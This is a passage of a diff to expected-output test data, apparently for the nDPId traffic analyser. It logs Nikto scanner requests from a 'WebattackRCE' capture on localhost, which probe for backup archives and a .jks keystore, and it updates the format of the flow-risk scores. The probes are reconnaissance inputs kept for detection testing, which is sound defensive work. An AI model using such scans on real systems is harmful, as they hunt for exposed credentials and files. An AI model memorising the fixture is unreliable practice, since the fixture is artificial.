 00660{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":243,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":243,"flow_packet_id":1,"flow_last_seen":1576420277046,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"ts_msec":1576420277046,"pkt":"AAAAAAAAAAAAAAAACABFAADBTDZAAEAG7\/5\/AAABfwAAAcNuH5C8OnRaQfn7gYAYAED+tQAAAQEICp1m\/F6dZvxeR0VUIC8wLnRhci5iejIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"}
-00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":243,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277046,"flow_last_seen":1576420277046,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277046,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50030,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":243,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277046,"flow_last_seen":1576420277046,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277046,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50030,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":244,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277048,"flow_last_seen":1576420277048,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277048,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50032,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":244,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":1,"flow_last_seen":1576420277048,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"ts_msec":1576420277048,"pkt":"AAAAAAAAAAAAAAAACABFAADBa4BAAEAG0LR\/AAABfwAAAcNwH5C2s1MRi3VVO4AYAED+tQAAAQEICp1m\/GCdZvxfR0VUIC8wLnRhci5iejIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"}
-00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":244,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277048,"flow_last_seen":1576420277048,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277048,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50032,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":244,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277048,"flow_last_seen":1576420277048,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277048,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50032,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":245,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277049,"flow_last_seen":1576420277049,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420277049,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50034,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":245,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":245,"flow_packet_id":1,"flow_last_seen":1576420277049,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"ts_msec":1576420277049,"pkt":"AAAAAAAAAAAAAAAACABFAADEjgBAAEAGrjF\/AAABfwAAAcNyH5D9QLWRKHRYjoAYAED+uAAAAQEICp1m\/GGdZvxhR0VUIC8xMjcuMC50YXIuZ3ogSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
-00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":245,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277049,"flow_last_seen":1576420277049,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420277049,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50034,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":245,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277049,"flow_last_seen":1576420277049,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420277049,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50034,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":246,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277050,"flow_last_seen":1576420277050,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420277050,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50036,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":246,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":246,"flow_packet_id":1,"flow_last_seen":1576420277050,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"ts_msec":1576420277050,"pkt":"AAAAAAAAAAAAAAAACABFAADEqilAAEAGkgh\/AAABfwAAAcN0H5AfdZJKMNG2kYAYAED+uAAAAQEICp1m\/GKdZvxiR0VUIC8xMjcuMC50YXIuZ3ogSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":246,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277050,"flow_last_seen":1576420277050,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420277050,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50036,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":246,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277050,"flow_last_seen":1576420277050,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420277050,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50036,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":247,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277051,"flow_last_seen":1576420277051,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277051,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50038,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":247,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":247,"flow_packet_id":1,"flow_last_seen":1576420277051,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"ts_msec":1576420277051,"pkt":"AAAAAAAAAAAAAAAACABFAADFD2RAAEAGLM1\/AAABfwAAAcN2H5CQvDcOP8imdIAYAED+uQAAAQEICp1m\/GOdZvxjR0VUIC8xMjdfMF8wXzEuamtzIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":247,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277051,"flow_last_seen":1576420277051,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277051,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50038,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":247,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277051,"flow_last_seen":1576420277051,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277051,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50038,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":248,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277054,"flow_last_seen":1576420277054,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277054,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50040,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":248,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":248,"flow_packet_id":1,"flow_last_seen":1576420277054,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"ts_msec":1576420277054,"pkt":"AAAAAAAAAAAAAAAACABFAADFMyBAAEAGCRF\/AAABfwAAAcN4H5CwJQty\/UTYeoAYAED+uQAAAQEICp1m\/GadZvxmR0VUIC8xMjdfMF8wXzEuamtzIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":248,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277054,"flow_last_seen":1576420277054,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277054,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50040,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":248,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277054,"flow_last_seen":1576420277054,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277054,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50040,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":249,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277055,"flow_last_seen":1576420277055,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277055,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50042,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":249,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":249,"flow_packet_id":1,"flow_last_seen":1576420277055,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"ts_msec":1576420277055,"pkt":"AAAAAAAAAAAAAAAACABFAADBVOZAAEAG505\/AAABfwAAAcN6H5D0fGyVu01Ol4AYAED+tQAAAQEICp1m\/GedZvxnR0VUIC8xMjcuMC5lZ2cgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":249,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277055,"flow_last_seen":1576420277055,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277055,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50042,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":249,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277055,"flow_last_seen":1576420277055,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277055,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50042,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":250,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277057,"flow_last_seen":1576420277057,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277057,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50044,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":250,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":250,"flow_packet_id":1,"flow_last_seen":1576420277057,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"ts_msec":1576420277057,"pkt":"AAAAAAAAAAAAAAAACABFAADBgcdAAEAGum1\/AAABfwAAAcN8H5AHG7m2UJwwhYAYAED+tQAAAQEICp1m\/GmdZvxpR0VUIC8xMjcuMC5lZ2cgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"}
-00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":250,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277057,"flow_last_seen":1576420277057,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277057,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50044,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":250,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277057,"flow_last_seen":1576420277057,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277057,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50044,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":251,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277058,"flow_last_seen":1576420277058,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277058,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50046,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
